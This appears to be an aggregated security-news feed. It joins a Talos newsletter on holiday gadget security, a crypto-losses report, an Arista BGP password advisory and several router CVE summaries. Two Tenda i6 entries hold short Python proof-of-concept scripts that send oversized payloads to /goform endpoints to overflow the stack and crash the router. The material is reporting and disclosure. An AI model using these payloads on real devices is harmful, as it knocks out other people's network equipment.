When searching for holiday gifts online, make sure you’re buying from a trusted vendor, or if you haven’t heard of the vendor before, take a few extra minutes just to look them up and read their app’s privacy policy.

Thursday, December 7, 2023 14:00

As I wrote about last week, there are holiday shopping-related scams already popping up all over the place.  

But another aspect of security that many shoppers don’t consider this time of year is the security of the products they’re buying, even through a legitimate online marketplace. 

This is a glaring issue with home security cameras and Wi-Fi-connected doorbells, but I can’t imagine these are particularly popular holiday gifts. With virtually everything being connected to the internet somehow these days, everything is a potential security risk if you’re buying a new piece of technology. 

Take smartwatches, for example. Apple Watches and Samsung Galaxy watches are always popular on everyone’s wishlists this time of year because they’re high-priced items you normally wouldn’t buy for yourself. Many shoppers might be looking for a deal this time of year and not looking to spend hundreds on the gift, so any sort of cheaper alternative could be appealing. 

I searched for “smart watches” on Amazon, and the results page displayed four different watches from four different vendors as their “Top Results,” none of which were Samsung and Apple. Well-known vendors are certainly not immune to security issues or vulnerabilities, but at least users can be confident that any known vulnerabilities will be disclosed and patched by these companies as they pop up. 

The top result is for a $29.99 smartwatch that offers sleep tracking, blood pressure monitoring, dozens of different workout modes, step tracking, and more. However, there are a few security flags for me right up front with this deal (after all, if it seems too good to be true, it probably is). Amazon states the seller is a company called “Nerunsa,” but a quick search did not turn up any legitimate information on who this company is, where they’re based, or the sort of security bona fides you’d be hoping for. The only search results are for the company’s Amazon store page and a few eBay listings for people reselling the watch in question. 

The app that’s listed as supporting the watch is called “GloryFit” on the Google Play and Apple app stores, and its privacy policy is equally vague. It states that the app will collect all the suspected information for someone using a smartwatch — phone calls, text messages, GPS location, personal information, health information, etc. But, the policy states that, when the user accepts the privacy policy, “You hereby consent to our process and disclose personal information to our affiliated companies (which are in the communications, social media, technology and cloud businesses) and to Third Party Service Providers for the purposes of this Privacy Policy.” And it’s not particularly clear what those other companies do, exactly — Google was no help here, either. 

Apple Air Tags are also another popular tech gift every year and are usually featured in major retailers’ Black Friday sales. I personally have my own concerns about any type of tracking tag coming into my house, but that’s for another column. 

On Walmart, which is increasingly trying to compete with Amazon by offering more products online, I searched for “smart tag” and found three results that appeared ahead of Apple’s legitimate Air Tags. The second-most-popular result is for a “Bluetooth Tracker and Item Locator” that’s only $15.98, compared to $86.88 for a four-pack of Apple’s. This tracker is listed as being made by “AILIUTOP,” which also remains elusive on the internet and does not seem to have any sort of legitimate contact information available to the public. Their store page on Walmart indicates the seller offers many types of products, from clothing to home goods and more.  

 This seems like a good bargain as a gift for someone who is always losing their keys or wallet or wants to make sure their bicycle is secure when they lock it up somewhere. But purchasing these types of “smart” devices with so much uncertainty poses a few issues. 

If you do experience some sort of security failure or issue, there is no easy way to contact any of these vendors through the traditional means that the average user would go searching for. These vendors have no clear history of responsibly disclosing vulnerabilities, releasing security updates, or testing their products’ security before release. 

When these types of gifts are dealing with such high-profile information like your personal information, health data, or physical location, users should be confident that their information is being stored correctly and securely, or at least there’s a way to contact the vendor should they have any questions. 

When searching for holiday gifts online, make sure you’re buying from a trusted vendor, or if you haven’t heard of the vendor before, take a few extra minutes just to look them up, read their app’s privacy policy, or even read the reviews to make sure there’s no clear sign of bot activity like repetitive words or phrases or using the same photo for multiple reviews.  

**The one big thing **

The 2023 Cisco Talos Year in Review is now available to download. Once again, the Talos team has meticulously combed through a massive amount of data to analyze the major trends that have shaped the threat landscape in 2023. Global conflict influenced a lot of these trends, altering the tactics and approaches of many threat actors. In operations ranging from espionage to cybercrime, we’ve seen geopolitical events have a significant impact on the way these are carried out. 

**Why do I care? **

The Year in Review report includes new data and telemetry from Talos about attacker trends, popular malware seen in the wild, and much more. Despite the accelerated pace of many threat actor campaigns and the geopolitical events that shaped them, our report shows that the defensive community’s diligence, inventiveness and collaborative efforts are helping to push adversaries back.   

**So now what? **

Download our full report here, bookmark the Year in Review landing page for future content we have planned around the report, and listen to the Beers with Talos episode that covers the details of the report. 

**Top security headlines of the week **

**More than six million people are reportedly victims of a large data breach at DNA and genealogy testing firm 23andMe.** The breach is larger than initially expected, with more than 5.5 million users who opted into the company’s “DNA Relatives” feature, which allows customers to automatically share some of their data with other users. Another 1 million-plus users had their family tree information accessed. The attackers accessed the accounts because of password reuse from users, likely who used easy-to-guess login information or passwords they used across multiple other accounts. 23andMe was not the target of the initial breach, nor was a company account the source of the compromised credentials. Security experts are urging users to move away from traditional username-and-password login methods as these types of attacks happen more often, instead moving toward multi-factor authentication or passwordless logins. (TechCrunch, Wall Street Journal) 

**Apple released emergency fixes for two zero-day vulnerabilities in its WebKit browser engine that have already been exploited in the wild.** The company reported that the flaws are being exploited on devices running on iOS versions before iOS 16.7.1 (released on Oct. 10, 2023). There are new patches available, which users should install immediately, in iOS, iPadOS, macOS Sonoma and the Safari web browser. The two vulnerabilities tracked as CVE-2023-42916 and CVE-2023-42917, leave affected devices vulnerable to adversaries accessing sensitive information on targeted devices. CVE-2023-42917 could also allow an attacker to execute arbitrary code on the targeted machine. (SC Magazine, Decipher) 

**Security researchers say a new threat actor known as “AeroBlade” compromised a U.S. aerospace company for more than a year.** The actor reportedly started testing their malware and infection chain on the targeted network in September 2022 and executed malware on the network in July 2023. The activity sat undetected for months due to anti-analysis techniques. It is currently unknown what actions, if any, the actor carried out during that time or if they compromised any user or customer data. The initial infection began with a Microsoft Word lure document with the title, “"SOMETHING WENT WRONG Enable Content to load the document." The ensuing malicious Microsoft Word template (DOTM) file then loaded a DLL that served as a reverse shell. Researchers say the attacker’s intent was likely to steal data from the target to sell it, potentially supply it to international competitors, or use it to extort the target into paying a ransom. (Dark Reading, Bleeping Computer)  

**Can’t get enough Talos? **

Security journalists from Decipher bring you the headlines, including new U.S. government sanctions on threat actor groups in our latest Threat Spotlight video.

Then, Hazel chats to Talos security researcher Joe Marshall to discuss the Talos 2023 Year in Review, and Project PowerUp, the story of how Cisco Talos worked with a multi-national, multi-company coalition of volunteers and experts to help “keep the lights on” in Ukraine, by injecting a measure of stability in Ukraine’s power transmission grid.

**Upcoming events where you can find Talos **

**"Power of the Platform” by Cisco** **(Dec. 5 & 7)** 

Virtual (Please note: This presentation will only be given in German) 

_The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you._  

**What Threats Kept Us Up in 2023: A Year in Review and a Look Ahead** **(Dec. 13, 11 a.m. PT)** 

Virtual 

_Each year brings new threats that take advantage of increasingly complex security environments. Whether it’s Volt Typhoon targeting critical infrastructure organizations across the United States or ALPHV launching an attack against casino giant MGM, threat actors are becoming bolder and more evasive. That’s why it’s never been more important to leverage broad telemetry sources, deep network insights and threat intelligence to respond effectively and recover faster from sophisticated attacks. Join Amy Henderson, Director of Strategic Planning and Communications at Cisco Talos and Briana Farro, Director of XDR Product Management at Cisco, as they discuss some of the top threat trends and threats we have seen this past year and how to leverage security technology like XDR and network insights to fight against them._ 

**NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security** **(Jan. 11, 2024, 10 a.m. GMT)** 

Virtual 

_The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations._  

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a   
**MD5:** 200206279107f4a2bb1832e3fcd7d64c   
**Typical Filename:** lsgkozfm.bat   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd 

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440   
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e   
**Typical Filename:** iizbpyilb.bat   
**Claimed Product:** N/A    
**Detection Name:** Trojan.Agent.DDOH 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7    
**MD5:** 0e4c49327e3be816022a233f844a5731    
**Typical Filename:** aact.exe    
**Claimed Product:** AAct x86    
**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos 

**SHA 256:** 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e   
**MD5:** 040cd888e971f2872d6d5dafd52e6194   
**Typical Filename:** streamer.exe   
**Claimed Product:** Ultra Virus Killer   
**Detection Name:** PUA.Win.Virus.Ultra::95.sbx.tg

Cybersecurity considerations to have when shopping for holiday gifts

A cross-site-scripting vulnerability exists in Ruckus Access Point products (ZoneDirector, SmartZone, and AP Solo). If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who is logging in the product. As for the affected products/models/versions, see the information provided by the vendor listed under [References] section or the list under [Product Status] section.

CVE-2023-49225: 20231128 | Security Bulletins | Ruckus Wireless Support

By Waqas
November 2023 has emerged as the most devastating year for crypto users and the most lucrative for cybercriminals and malicious hackers, as the majority of crypto hacks occurred during that month.
This is a post from HackRead.com Read the original post: Cryptocurrency losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed

According to the crypto bug bounty and cybersecurity firm Immunefi, hackings accounted for $335,574,150 in losses in November 2023, involving 18 incidents.

The world’s leading blockchain cybersecurity platform, Immunefi, has published its Crypto Losses in November 2023 Report, according to which **cryptocurrency losses** have surpassed $1.75 billion due to hacks and rug pull attacks between January and November 2023. This includes 296 distinct incidents. The cryptocurrency ecosystem has witnessed $1,753,707,812 in losses year-to-date (YTD) across 296 specific incidents.

Graph credit: Immunefi

The report is quite concerning. It comes at the same time when the cybersecurity firm Unciphered discovered a critical vulnerability, dubbed ‘**Randstorm**,’ that has put billions of dollars in Bitcoin and crypto assets at risk due to outdated wallets.

In Immunefi’s October 2023 **report**, the Singapore-based Immunefi revealed that cryptocurrency attacks surged by 153% year-over-year in Q3 2023. The two largest exploits targeting Multichain and Mixin Network collectively accounted for 47.5% of all losses. The North Korean state-sponsored hacking group **Lazarus Group**’s cyberattack represented 30% of the total losses, with $208.6 million in stolen funds.

According to Immunefi’s latest **report** (PDF), a record-breaking $343 million was lost to fraud and hacks in November 2023 alone, making it the highest monthly loss this year, representing a significant 15.4x increase from October 2023’s losses that amounted to $22 million.

Hackings accounted for $335,574,150 in losses in November 2023, involving 18 incidents. This highlights that hacking poses a persistent threat in the cryptocurrency space.

On the other hand, fraudulent activities resulted in losses of $7,464,660 in 23 separate incidents, which is comparatively lower than hacking but remains a concerning issue in the industry.

In a notable shift, Centralized Finance (**CeFi**) emerged as the primary target for exploits in November 2023, surpassing Decentralized Finance (**DeFi**) in lost funds. Immunefi found that CeFi accounted for 53.8% of overall losses, whereas DeFi accounted for 46.2%. These spikes are primarily attributed to high-profile attacks on platforms like HTX Exchange, Poloniex, and Kronos Research.

DeFi platforms recorded $158,638,810 in losses in November 2023 in 37 distinct incidents, making DeFi a vulnerable sector. CeFi platforms suffered $184,400,000 in losses in November 2023 in four incidents.

The BNB Chain and **Ethereum blockchains** remained the most targeted platforms in November 2023, accounting for more than half (83%) of the total losses in all targeted chains.

BNB Chain became a target of 22 incidents, leading to losses of 53.7% of the total losses, whereas Ethereum accounted for 29.3% of the total losses with 12 incidents. Arbitrum, Optimism, Avalanche, Fantom, and Heco Chain each suffered one attack in November 2023, contributing the remaining 2.4% of the total losses.

Immunefi is the premier **bug bounty** and security services provider, safeguarding Web3 ecosystems and protecting a staggering $50 billion in user funds with its vast network of white hackers.

Graph credit: Immunefi

**Immunefi** empowers cybersecurity experts to scrutinize project code, detect and responsibly disclose vulnerabilities, and offer rewards for their contributions. This collaborative approach, according to the company, has resulted in the disbursement of over $85 million in total bounties, averting potential losses of over $25 billion in user funds. Since its inception, Immunefi has saved over $25 billion from being stolen.

As an investor in the ever-evolving world of cryptocurrency, DeFi, blockchain, and Web3, it’s crucial to prioritize the security of your digital assets. Here are 5 essential tips to protect your funds from hackers and cyber attacks:

****Secure Your Wallets****

*   **Use Cold Wallets:** These hardware devices store your private keys offline, making them significantly less susceptible to cyberattacks compared to hot wallets (software wallets connected to the internet). Popular cold wallets include Ledger, Trezor, and KeepKey.
*   **Diversify Your Wallets:** Don’t store all your funds in one wallet. Distribute them across multiple wallets for better risk management.
*   **Implement Strong Passwords:** Use unique and complex passwords for all your wallets and exchanges. Consider password managers for efficient management.
*   **Enable 2-Factor Authentication (2FA):** 2FA adds an extra layer of security by requiring a second verification factor, like a code sent to your phone, when logging in or making transactions.

****Practice Cybersecurity Hygiene****

*   **Stay Vigilant:** Be wary of phishing scams, unsolicited emails, and suspicious links. Never share your private keys or seed phrases with anyone, even those claiming to be support personnel.
*   **Keep Software Updated:** Ensure your operating systems, wallets, and other relevant software are updated with the latest security patches.
*   **Use Secure Networks:** Avoid using public Wi-Fi for accessing your crypto accounts. Opt for secure, private networks whenever possible.
*   **Be Cautious of dApps**: Before interacting with any dApp (decentralized application), research its reputation and security practices.

****Choose Reputable Platforms:****

*   **Research Exchanges:** Before investing in an exchange, thoroughly research its security features, reputation, and regulatory compliance.
*   **Prioritize Transparency:** Choose platforms that prioritize transparency in their operations and code.
*   **Beware of Unknown Projects:** Exercise caution when investing in unfamiliar projects or dApps. Conduct thorough research and due diligence before committing any funds.

****Stay Informed and Educate Yourself:****

*   **Continuously learn:** The crypto landscape is constantly evolving, so stay updated on the latest security threats and best practices. Follow reliable sources and participate in educational communities.
*   **Be aware of common scams:** Learn about common phishing tactics, exit scams, and other fraudulent activities targeting crypto investors.
*   **Seek expert advice:** If you’re unsure about any aspect of crypto security, don’t hesitate to consult with a trusted security expert or financial advisor.

****Backup Your Keys:****

*   **Always have a backup plan:** Create backups of your private keys and seed phrases and store them securely offline, preferably in multiple locations.
*   **Consider multi-signature wallets:** These wallets require multiple keys to authorize transactions, offering an additional layer of protection.

Lastly, but most importantly, visit Hackread.com regularly. Follow us on **X (formerly Twitter)**, **Facebook**, or **LinkedIn** to stay updated on daily cybersecurity news and threats.

****_RELATED ARTICLES_****

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **Crypto Scammers Exploit Gaza Crisis in Donation Scam**
3.  **We Need Smarter Smart Contracts To Prevent DeFi Hacks**
4.  **New MortalKombat Ransomware Attack Aiming for Crypto Wallets**
5.  **Scammers Use Fake Ledger App on Microsoft Store to Steal $800K**
6.  **8,000 Solana Wallets Drained Millions Worth of Crypto in Cyberattack**

Cryptocurrency losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed

On affected platforms running Arista MOS, the configuration of a BGP password will cause the password to be logged in clear text that can be revealed in local logs or remote logging servers by authenticated users, as well as appear in clear text in the device’s running config. 


**Date: December 5, 2023**

Revision

Date

Changes

1.0

December 5, 2023

Initial release

The CVE-ID tracking this issue: CVE-2023-24547  
CVSSv3.1 Base Score: 5.9 (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:H)  
Common Weakness Enumeration: CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer  
This vulnerability is being tracked by BUG868319, BUG873034, MOS-2222, MOS-2255.

**Description**

On affected platforms running Arista MOS, the configuration of a BGP password will cause the password to be logged in clear text that can be revealed in local logs or remote logging servers by authenticated users, as well as appear in clear text in the device’s running config. This could result in unauthorized route announcements from malicious peers or cause traffic loss.

This issue was discovered internally and Arista is not aware of any malicious uses of this issue in customer networks.

**Vulnerability Assessment****Affected Software******MOS Versions****

*   MOS-0.13.0 onwards

**Affected Platforms**

The following products **are** affected by this vulnerability:

*   Arista 7130 Systems running MOS
*   Pre-Arista labeled devices (Metamako)

The following product versions and platforms **are not** affected by this vulnerability:

*   Arista EOS-based products:  
    *   720D Series
    *   720XP/722XPM Series
    *   750X Series
    *   7010 Series
    *   7010X Series
    *   7020R Series
    *   7130 Series running EOS
    *   7150 Series
    *   7160 Series
    *   7170 Series
    *   7050X/X2/X3/X4 Series
    *   7060X/X2/X4/X5 Series
    *   7250X Series
    *   7260X/X3 Series
    *   7280E/R/R2/R3 Series
    *   7300X/X3 Series
    *   7320X Series
    *   7358X4 Series
    *   7368X4 Series
    *   7388X5 Series
    *   7500E/R/R2/R3 Series
    *   7800R3 Series
    *   CloudEOS
    *   cEOS-lab
    *   vEOS-lab
    *   AWE 5000 Series
*   Arista Wireless Access Points
*   CloudVision WiFi, virtual appliance or physical appliance
*   CloudVision WiFi cloud service delivery
*   CloudVision eXchange, virtual or physical appliance
*   CloudVision Portal, virtual appliance or physical appliance
*   CloudVision AGNI
*   Arista Converged Cloud Fabric and DANZ Monitoring Fabric (Formerly Big Switch Nodes for BCF and BMF)
*   Arista Network Detection and Response (NDR) Security Platform (Formerly Awake NDR)
*   Arista Edge Threat Management - Arista NG Firewall and Arista Micro Edge (Formerly Untangle)

**Required Configuration for Exploitation**

In order to be vulnerable to CVE-2023-24547 the following condition must be met:

A BGP password must be configured and be in plain text. An example of this is shown below:

switch>show running-config bgp
router bgp 65000
   neighbor 192.0.2.1 remote-as 66000
   neighbor 192.0.2.1 password pA$$w0rd

If a BGP password is not configured there is no exposure to this issue.

**Indicators of Compromise**

No indicators of compromise exist.

**Mitigation**

No mitigation exists.

**Resolution**

The recommended resolution is to upgrade to a remediated software version at your earliest convenience. Arista recommends customers move to the latest version of each release that contains all the fixes listed below. For more information about upgrading see the MOS User Guide: Updating

CVE-2023-24547 has been fixed in the following releases:

*   MOS-0.36.10 and later releases in the MOS-0.36.x train
*   MOS-0.39.4 and later releases in the MOS-0.39.x train

Because this issue would cause the password to be saved in logs and remote AAA servers it is recommended to also rotate the BGP password, if possible. Upon upgrading to a new release, the BGP password will be obfuscated with the type-7 algorithm as shown below:

switch>show running-config bgp
router bgp 65000
   neighbor 192.0.2.1 remote-as 66000
   neighbor 192.0.2.1 password key 7 00143242404C5B140B

**Hotfix**

The following hotfix can be applied to remediate CVE-2023-24547. The hotfix only applies to the releases listed below and no other releases. All other versions require upgrading to a release containing the fix (as listed above):

*   MOS-0.39.3 and below releases in the MOS-0.39.x train
*   MOS-0.38.1 and below releases in the MOS-0.38.x train
*   MOS-0.37.1 and below releases in the MOS-0.37.x train
*   MOS-0.36.9 and below releases in the MOS-0.36.x train
*   MOS-0.35.3 and below releases in the MOS-0.35.x train
*   MOS-0.34.0 in the MOS-0.34.x train

Please note that the only MOS release trains currently under maintenance support are MOS-0.39.x and MOS-0.36.x. The hotfix working for other releases should not be treated as evidence that these releases continue to be supported. For security it is important to ensure supported releases are used.

Version: 1.0
URL: hotfix-cve-2023-24547-4.0.0-1.14.core2\_64.rpm
SWIX hash:(SHA512)
168b2ee3deb8d4a3151b9c24936ff9d6523557b366ceffc98e57e8bf80638997

For instructions on installation and verification of the hotfix patch, refer to the "How to Install an Application" Guide.

**For More Information**

If you require further assistance, or if you have any further questions regarding this security notice, please contact the Arista Networks Technical Assistance Center (TAC) by one of the following methods:

**Open a Service Request**

By email: This email address is being protected from spambots. You need JavaScript enabled to view it.  
By telephone: 408-547-5502 ; 866-476-0000  
Contact information needed to open a new service request may be found at: https://www.arista.com/en/support/customer-support

CVE-2023-24547: Security Advisory 0090 - Arista

An issue was discovered on Connectize AC21000 G6 641.139.1.1256 allows attackers to run arbitrary commands via use of a crafted string in the ping utility.

CVE-2023-24046: Technical Advisory – Multiple Vulnerabilities in Connectize G6 AC2100 Dual Band Gigabit WiFi Router (CVE-2023-24046, CVE-2023-24047, CVE-2023-24048, CVE-2023-24049, CVE-2023-24050, CVE-2023-24051, CVE

Tenda i6 V1.0.0.8(3856) is vulnerable to Buffer Overflow via /goform/WifiMacFilterSet.

**Tenda APi6 V1.0.0.8(3856) Stack Overflow****Firmware information**

Manufacturer's address:https://www.tenda.com.cn/

Firmware download address: https://www.tenda.com.cn/download/detail-2570.html

**Affected Version****Vulnerability Details**

Vulnerability Location: /goform/WifiMacFilterSet

The length of the ndex parameter is not verified, sprintf can cause stack overflow vulnerability, it can result in dos attacks on routers.

The pages of the router

**POC**

import requests
from pwn import\*

ip \= "192.168.182.21" 
url \= "http://" + ip + "/goform/WifiMacFilterSet"
print(url)

payload \=b'a'\*0x3000

cookie \= {"Cookie":"user="}
data \= {"index": payload,"wl\_radio":0}
response \= requests.post(url, cookies\=cookie, data\=data)
print(response.text)
print("HackAttackSuccess!")

CVE-2023-48964: GitHub - daodaoshao/vul_tenda_i6_2

Tenda i6 V1.0.0.8(3856) is vulnerable to Buffer Overflow via /goform/wifiSSIDget.

**Tenda APi6 V1.0.0.8(3856) Stack Overflow****Firmware information**

Manufacturer's address:https://www.tenda.com.cn/

Firmware download address: https://www.tenda.com.cn/download/detail-2570.html

**Affected Version****Vulnerability Details**

Vulnerability Location: /goform/wifiSSIDget

The length of the ndex parameter is not verified, sprintf can cause stack overflow vulnerability, it can result in dos attacks on routers

The pages of the router

**POC**

import requests from pwn import\*

ip = "192.168.182.21" url = "http://" + ip + "/goform/wifiSSIDget" print(url)

payload =b'a'\*0x3000

cookie = {"Cookie":"user="} data = {"index": payload,"wl\_radio":0} response = requests.post(url, cookies=cookie, data=data) print(response.text) print("HackAttackSuccess!")

CVE-2023-48963: GitHub - daodaoshao/vul_tenda_i6_1

Tenda AC10 version US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via the shareSpeed parameter in the function fromSetWifiGuestBasic.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-45484: IOTvul/assets/fromSetWifiGuestBasic_code.png at master · l3m0nade/IOTvul

Stack Overflow vulnerability in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the ssid parameter in the function form_fast_setting_wifi_set.

CVE-2023-49044: IOT_VULN/Tenda/AX1803/form_fast_setting_wifi_set.md at main · Anza2001/IOT_VULN

Heap Overflow vulnerability in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the schedStartTime parameter or the schedEndTime parameter in the function setSchedWifi.

Tag

#wifi